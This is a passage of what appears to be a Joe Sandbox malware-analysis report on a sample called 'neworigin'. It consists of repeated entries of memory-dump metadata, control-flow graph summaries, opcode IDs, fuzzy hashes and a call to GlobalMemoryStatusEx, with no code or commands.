                                                                                                                                • Instruction Fuzzy Hash: 7E518030B112059FDB55DBB4D990BAE77F2AF88204F108969C819EB388EF34DC068B91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2791 252ef18-252ef23 2792 252ef25-252ef4c 2791->2792 2793 252ef4d-252ef50 2791->2793 2794 252ef51-252ef63 2793->2794 2813 252ef65 call 252ef18 2794->2813 2814 252ef65 call 252ef08 2794->2814 2815 252ef65 call 252efe8 2794->2815 2816 252ef65 call 252efa8 2794->2816 2797 252ef6a-252ef6c 2798 252ef72-252efc4 2797->2798 2799 252ef6e-252ef71 2797->2799 2798->2794 2804 252efc6-252efd1 2798->2804 2805 252efd3-252efd6 2804->2805 2806 252efd7-252f064 GlobalMemoryStatusEx 2804->2806 2809 252f066-252f06c 2806->2809 2810 252f06d-252f095 2806->2810 2809->2810 2813->2797 2814->2797 2815->2797 2816->2797
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2421489889.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2520000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a137c54f231353e2f486d817b7d98e3e367df19b9676981d6688b93370507f52
                                                                                                                                • Instruction ID: da09fc53370118a0cdd5d380df6fe67a67660c2ad7ebe56347856af8dbe5834f
                                                                                                                                • Opcode Fuzzy Hash: a137c54f231353e2f486d817b7d98e3e367df19b9676981d6688b93370507f52
                                                                                                                                • Instruction Fuzzy Hash: 6E413472D147998FCB10CFB9D4442EEBBF1FF9A310F14856AD418A7280DB74A889CB94

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2817 252efe8-252f064 GlobalMemoryStatusEx 2819 252f066-252f06c 2817->2819 2820 252f06d-252f095 2817->2820 2819->2820
                                                                                                                                APIs
                                                                                                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0252F057
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2421489889.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2520000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1890195054-0
                                                                                                                                • Opcode ID: f53ce186764ad99c4a045cccc2bb151c00001bdfa0a3cf7e3d336c1d02732358
                                                                                                                                • Instruction ID: ec1cd2fb18762ca9c6d3e97dd18fa7a1243f4d5764e807810342e0a6fdab0c39
                                                                                                                                • Opcode Fuzzy Hash: f53ce186764ad99c4a045cccc2bb151c00001bdfa0a3cf7e3d336c1d02732358
                                                                                                                                • Instruction Fuzzy Hash: 841133B1C006599FCB10CFAAD544BEEFBB4BF48310F11816AE818A7240C378A945CFA5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PH]q
                                                                                                                                • API String ID: 0-3168235125
                                                                                                                                • Opcode ID: 15ab242ec565678b59f00611778443335b1296accf72e38770d377d319db611f
                                                                                                                                • Instruction ID: e77e1e19b26dda48dbb3be9b629b5ab6260905fdaf836799961270416e23d96a
                                                                                                                                • Opcode Fuzzy Hash: 15ab242ec565678b59f00611778443335b1296accf72e38770d377d319db611f
                                                                                                                                • Instruction Fuzzy Hash: 7241E231B10205CFDF585B7898506BE77A6AB88365F24482DD406DB384EF36CD82C791
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PH]q
                                                                                                                                • API String ID: 0-3168235125
                                                                                                                                • Opcode ID: a67b5a2abdd335154f81c9c408a828f5fb40c17259539bf789d468a15daf185b
                                                                                                                                • Instruction ID: db9672104cb6e1a2789cf7b75390b4566a626c80e5fe029f568767e8fe02b00c
                                                                                                                                • Opcode Fuzzy Hash: a67b5a2abdd335154f81c9c408a828f5fb40c17259539bf789d468a15daf185b
                                                                                                                                • Instruction Fuzzy Hash: A8411035B002059FCB68AB74D9546AE7BA6EF89360F10843CE406EB368DF34DE46C790
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: nKuq
                                                                                                                                • API String ID: 0-4080595220
                                                                                                                                • Opcode ID: dcbc3858186b0f950a649cfa048e033d18aaca803b4fb50afbee93d602f2924b
                                                                                                                                • Instruction ID: f9d034871db02fa613a8c911a108b0a22e1e2a0e3d33db894b2017ea4d120495
                                                                                                                                • Opcode Fuzzy Hash: dcbc3858186b0f950a649cfa048e033d18aaca803b4fb50afbee93d602f2924b
                                                                                                                                • Instruction Fuzzy Hash: 8C31F634F00215AFDF649BA8D9417BFBBBAEB88720F10842AF505E3395CB7489418BD5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f5a1b2700ba9fdbcaae1c96ff28a50a38d72b71ad2a53a01faf5e7a12ba00ef5
                                                                                                                                • Instruction ID: 8e183424b7c20aa4dbff2905d9b9d625a8ef3cd1c9c2f24c4c6d48201f12edd4
                                                                                                                                • Opcode Fuzzy Hash: f5a1b2700ba9fdbcaae1c96ff28a50a38d72b71ad2a53a01faf5e7a12ba00ef5
                                                                                                                                • Instruction Fuzzy Hash: B7B1C235E10258AFDF60CFA4C841BAEBBB2FB55320F10496AE50ADB291CB34DD45CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6251b8149479b464514719ba1a7d5c3628373db60912a89acc2a5fb7588f0d7a
                                                                                                                                • Instruction ID: b2d153d146f1539c6b585e6a435c9c09c39e6107fd8b902bb51edcfc4620c75f
                                                                                                                                • Opcode Fuzzy Hash: 6251b8149479b464514719ba1a7d5c3628373db60912a89acc2a5fb7588f0d7a
                                                                                                                                • Instruction Fuzzy Hash: 66A1E931E04205CFDB60CF69C980BAEBBA5EF99331F14896AE419DB295D732EC41C791
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d3351f10857ea59b005d7fca8845c2a74e9507128e1a75fe927683af61f62544
                                                                                                                                • Instruction ID: 6c1d329e9b99f5b15860fce3c72747601a410094d6ef5127a399113ded1dc675
                                                                                                                                • Opcode Fuzzy Hash: d3351f10857ea59b005d7fca8845c2a74e9507128e1a75fe927683af61f62544
                                                                                                                                • Instruction Fuzzy Hash: 47914D30E002198FDF64DFA8C990B9DB7B1FF89300F208599D549BB295DB70AA85CF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6e035e79a37f3dec2d7c556c735b6614e3aed2b377f89b3452c83dee2b430b15
                                                                                                                                • Instruction ID: d95c1f049e7b5d73a690788cc2855cd3c1aafc56d61dec80f9a5b2b2f51ff70c
                                                                                                                                • Opcode Fuzzy Hash: 6e035e79a37f3dec2d7c556c735b6614e3aed2b377f89b3452c83dee2b430b15
                                                                                                                                • Instruction Fuzzy Hash: E3518D71D002149FCB60DFA9C881B9EBBB5FF99320F14856EE909EB251D734D905CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 246ab409619ae7ec8829b8e919664aa2d043fd6192323adf90f249581ce6884e
                                                                                                                                • Instruction ID: d78c7eb86aeb476da62fe9ade2efe39710c0a02820c57d135bdfbc4ef8086d00
                                                                                                                                • Opcode Fuzzy Hash: 246ab409619ae7ec8829b8e919664aa2d043fd6192323adf90f249581ce6884e
                                                                                                                                • Instruction Fuzzy Hash: 05518074B002059FCB55EF64D8909BEB7F7EFE8310B108A29E806A7358DB75A9468B41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cc972455f87d6909b57afdabec51758db49070a7fed35f94edc81fa258b88323
                                                                                                                                • Instruction ID: dd2291b501e002643087dbe94567e5eaada3fc2bd9ab7ae5bd1bf3207cdc7143
                                                                                                                                • Opcode Fuzzy Hash: cc972455f87d6909b57afdabec51758db49070a7fed35f94edc81fa258b88323
                                                                                                                                • Instruction Fuzzy Hash: 5851C034A002199FDB14DFA0D984AAEBBF2FF94750F24C529E805AB355DB70DD82CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6653bc7919a6ee1186a3cc3e41a8f66427a71010e83a8ade8cfd55fa1faca304
                                                                                                                                • Instruction ID: 637d99a20f11663476c7d96321367f9b14d6df03cba2daa52e500743fd6e2267
                                                                                                                                • Opcode Fuzzy Hash: 6653bc7919a6ee1186a3cc3e41a8f66427a71010e83a8ade8cfd55fa1faca304
                                                                                                                                • Instruction Fuzzy Hash: F951AE30A002198FDB14DFA4C594BAEBBF2BF94710F20C529E805AB355DB74ED82CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27b4e2ba2573b184da732e3b0fe5dab4593d97513276f2326ed3c6ff0f566642
                                                                                                                                • Instruction ID: e6a318be6735445f15202a4f653917b7c030f196de67ee65c1c09731c37e7407
                                                                                                                                • Opcode Fuzzy Hash: 27b4e2ba2573b184da732e3b0fe5dab4593d97513276f2326ed3c6ff0f566642
                                                                                                                                • Instruction Fuzzy Hash: 171129367082945FCB469FB85C1556F3FB7AFD9250B0544AAF905CB392DE348D0283AA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9d2b70d61133793edd95cbfea35430cfa7cd8e99c7f77ce129270df47df088af
                                                                                                                                • Instruction ID: 78158f25be17eb2353029b0cebc294b1416d97bbabf2500d4f3a0719ca45a485
                                                                                                                                • Opcode Fuzzy Hash: 9d2b70d61133793edd95cbfea35430cfa7cd8e99c7f77ce129270df47df088af
                                                                                                                                • Instruction Fuzzy Hash: 6B31F5B5C01259AFCB50CF99D485ADEBBF4FF58320F14805AE808AB256D3749A45CBA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4b3ecde26b2e6f4850faacaba1e920fbe696820d86a6c7576a7afb74d467f17d
                                                                                                                                • Instruction ID: 853273a09d5a406edb7d215c1f68c61e5f77c3491d6048e16f3493547e1db597
                                                                                                                                • Opcode Fuzzy Hash: 4b3ecde26b2e6f4850faacaba1e920fbe696820d86a6c7576a7afb74d467f17d
                                                                                                                                • Instruction Fuzzy Hash: 8621B431F100199FDF44DB69E9606ADB7B7EB84314F148525E409E7354DB30ED458BC1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 69bbf2825145ca88dce5c21155151916bcec73b7fa8984ea255aacf88c05434a
                                                                                                                                • Instruction ID: 98e7e3a38a57474c26553c338bdb143074310dafa34086ba40bac8461de69ca9
                                                                                                                                • Opcode Fuzzy Hash: 69bbf2825145ca88dce5c21155151916bcec73b7fa8984ea255aacf88c05434a
                                                                                                                                • Instruction Fuzzy Hash: B321F5B1C01259AFCB50CF99D585BDEFBF4EF58320F24805AE808AB255D3749A45CBA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 381d5728abf350bdd337ad7aef958384f7afa98ac2a1dce7b757262e39efc200
                                                                                                                                • Instruction ID: 87d690f0e77dc586bed6d16eb01387a3fadd5c4a80998bbf420b3c540f2b2338
                                                                                                                                • Opcode Fuzzy Hash: 381d5728abf350bdd337ad7aef958384f7afa98ac2a1dce7b757262e39efc200
                                                                                                                                • Instruction Fuzzy Hash: 0A112672800249DFDB10DF9AC945BEEBFF4EF48320F14845AE918A7210C379A554DFA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ad8fcf93a57f11a304aa6931e79bb9d2ff9739898e71d095b4ac88e8c3025bad
                                                                                                                                • Instruction ID: 889ba12b0947655dbedcc0c5cbb6279380a4935957391dccc029892408d2352f
                                                                                                                                • Opcode Fuzzy Hash: ad8fcf93a57f11a304aa6931e79bb9d2ff9739898e71d095b4ac88e8c3025bad
                                                                                                                                • Instruction Fuzzy Hash: 9801F135B001001FDB26CABCD850B2E77D6DFCA315B20892AE50BCB290DF24DE078786
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e29c4573e11c0cc0f9aeb6924b5e1aef15a08be74ec1f34a6a15dc6c7dc06e69
                                                                                                                                • Instruction ID: fd813002ae42dd43ae75605a73dcf056e85c910646794a4fa93528902e666726
                                                                                                                                • Opcode Fuzzy Hash: e29c4573e11c0cc0f9aeb6924b5e1aef15a08be74ec1f34a6a15dc6c7dc06e69
                                                                                                                                • Instruction Fuzzy Hash: D51126B6800249DFDB10CF99D945BEEBBF4EB48320F14881AE928A7250C379A554DFA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bd20b92d364c082853e56a928a9551dce07d2c9c347bc60d79862a9d5610ddf4
                                                                                                                                • Instruction ID: 1c36ecf501b18ec0a0713caa82ce2249a79fae5d11582c0848c32e3295e57180
                                                                                                                                • Opcode Fuzzy Hash: bd20b92d364c082853e56a928a9551dce07d2c9c347bc60d79862a9d5610ddf4
                                                                                                                                • Instruction Fuzzy Hash: 7E016D36B101111FDB659AADA454B2E67DADBC9624F108429E50BC7350DE25DE038386
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e0c5eb2fbe8afa0f0f7c46c60858c7696974f9b3cad9a1f61f4be35988016734
                                                                                                                                • Instruction ID: aaee14d87d2e91946e191223327e7e13e062ae4f1f1a8a318f236130eced6f60
                                                                                                                                • Opcode Fuzzy Hash: e0c5eb2fbe8afa0f0f7c46c60858c7696974f9b3cad9a1f61f4be35988016734
                                                                                                                                • Instruction Fuzzy Hash: 87F06935B001198FDB00CBA8D854BEEB7B1FF88322F1485A5E519A7294C7359911CBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d157daeed439e8ad31aee265cb6e38007ceebf5db3f1cac83d8b2725f81c9a17
                                                                                                                                • Instruction ID: f6f1e7187bfd133633e277c3d20d05abafa9c20a7d3fea599a76abd1a7676927
                                                                                                                                • Opcode Fuzzy Hash: d157daeed439e8ad31aee265cb6e38007ceebf5db3f1cac83d8b2725f81c9a17
                                                                                                                                • Instruction Fuzzy Hash: F7F05E367002196B9B059E99AC449AF7FAFEFC8260B00442AFE0983250DE72991197A9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ce349953371fe87b52fea85632880a87a3e41b6a4e450e23d3487c9a4fb46cd9
                                                                                                                                • Instruction ID: e8ba643cdfd516412a9a6bcacc04b37dfaba09bdb601a4659e52ac5a07637e7a
                                                                                                                                • Opcode Fuzzy Hash: ce349953371fe87b52fea85632880a87a3e41b6a4e450e23d3487c9a4fb46cd9
                                                                                                                                • Instruction Fuzzy Hash: DDF08C75D11205EF8B50DEF8AD015EF7FF8AB18262B10442AF809E2100E73082408BD0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4f3446b876d99cc75faa8f3ab29574d453707ba13209588075b2d62eb8adad56
                                                                                                                                • Instruction ID: 866eb40d7a1783047b7716629e89cb8d9247822600e5c6c9b9b1341727d3d4aa
                                                                                                                                • Opcode Fuzzy Hash: 4f3446b876d99cc75faa8f3ab29574d453707ba13209588075b2d62eb8adad56
                                                                                                                                • Instruction Fuzzy Hash: 38E04871D1021ADFCB50DEB99D151AF7BF8EB58251F014475D849D7240F731C60087D1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 90e5e58f1ab952f8f3d81f5e6fed2b75608e5808bde345c5248ca05889812363
                                                                                                                                • Instruction ID: 5f3bff975133304be88d23df4aeec7295fdf579907ecf7ff34f4afd486be726c
                                                                                                                                • Opcode Fuzzy Hash: 90e5e58f1ab952f8f3d81f5e6fed2b75608e5808bde345c5248ca05889812363
                                                                                                                                • Instruction Fuzzy Hash: 97E0C236F100216B5F18B694A5A05BD63E3EBED374310456AEA01C7389DB319A0647C4